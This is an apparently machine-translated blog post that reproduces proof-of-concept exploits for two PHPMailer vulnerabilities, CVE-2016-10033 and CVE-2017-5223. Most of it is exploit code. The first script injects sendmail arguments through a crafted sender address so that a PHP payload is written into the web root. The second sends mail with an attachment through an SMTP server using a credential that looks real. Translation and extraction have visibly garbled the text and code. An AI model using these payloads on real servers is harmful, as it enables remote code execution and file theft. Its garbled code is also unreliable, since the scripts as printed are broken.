Phpmailer command execution and arbitrary file Read vulnerability

Today on the Thinkphp official website loitering, did not intend to download a set of Eduaskcms, Check the Libs directory is actually there PHPMailer-5.2.13, think of the phpmailer before the loophole, unfortunately this set of CMS only provide a mailbox interface, front page need to write their own, there is no way to use this set of CMS to reproduce, this way also use this PHPMailer-5.2 .13 locally reproduce the cve-2016-10033 and the cve-2017-5223 and record it.

Phpmailer command Execution Vulnerability (CVE-2016-10033)

Vulnerability Number: cve-2016-10033

Impact version:phpmailer< 5.2.18

Vulnerability level: High risk

Vulnerability POC:

<?php/*Phpmailer < 5.2.18 Remote Code Execution (cve-2016-10033) A Simple PoC (working on Sendmail MTA) It'll inject th E following parameters to SendMail Command:arg no. 0 = = [/usr/sbin/sendmail] arg no. 1 = = [-T] arg no. 2 = = [-i] arg No. 3 = = [-fattacker\] arg no. 4 = = [-oq/tmp/] arg no. 5 = = [-x/var/www/cache/phpcode.php] arg no. 6 = = [some "@email. com] whic H would write the transfer log (-X) into/var/www/cache/phpcode.php file. The resulting file would contain the payload passed in the body of the msg:09607 <<<--b1_cb4566aa51be9f090d94191 63e492306 09607 <<< content-type:text/html; Charset=us-ascii 09607 <<< 09607 <<< <?php phpinfo ();?> 09607 <<< 09607 <<< 096 <<< 09607 <<<--b1_cb4566aa51be9f090d9419163e492306--See the full advisory URL for details. */ //attacker ' s input coming from untrusted source such as $_get, $_post etc. For example from a contact form $email _from = ' "Attacker\"-oq/tmp/-x/var/www/cache/phpcode.php some "@email. com"; $msg _body= "<?php phpinfo ();?>";//------------------//Mail () param injection via the vulnerability in Phpmailer require_once (' class.phpmailer.php ') ; $mail=NewPhpmailer ();//defaults to using php "Mail ()" $mail->setfrom ($email _from, ' Client Name ');$address= "[Email protected]"; $mail->addaddress ($address, "Some User"); $mail->subject = "Phpmailer PoC Exploit cve-2016-10033"; $mail->msghtml ($msg _body);if(!$mail->send ()) {Echo"Mailer Error:".$mail-ErrorInfo;} Else{Echo"Message sent!\n"; }

Phpmailer arbitrary file Read Vulnerability Analysis (cve-2017-5223)

Vulnerability Number: cve-2017-5223

Impact version: Phpmailer <= 5.2.21

Vulnerability level: High risk

Vulnerability POC: According to the author's PoC changed a few lines, so that it applies to QQ mailbox

<?php  #Author: yxlinkrequire_once (' phpmailerautoload.php '); $mail = new Phpmailer (); $mail->issmtp (); $ Mail->host = ' smtp.qq.com '; $mail->port = 465; $mail->smtpauth = true; $mail->username = [email protected] '; $mail->password = ' zsuhxbmsaioxbcgaq '; $mail->smtpsecure = ' SSL '; $mail- >charset  = "UTF-8"; $mail->encoding = "base64"; $mail->subject = "Hello"; $mail->from = "[Email protected ]";  $mail->fromname = "Test";   $address = "[email protected]"; $mail->addaddress ($address, "test"); $mail->addattachment (' test.txt ', ' test.txt '); $mail->ishtml (true);  $msg = "test"; $mail->msghtml ($msg); if (! $mail->send ()) {  echo "Mailer Error:". $mail->errorinfo;} else {  echo "Message sent!";}? >

　

Reference article:

Phpmailer arbitrary file Read Vulnerability Analysis (cve-2017-5223) http://www.freebuf.com/vuls/124820.html

Phpmailer command Execution Vulnerability (CVE-2016-10033) analysis http://blog.csdn.net/wyvbboy/article/details/53969278

Phpmailer command execution and arbitrary file Read vulnerability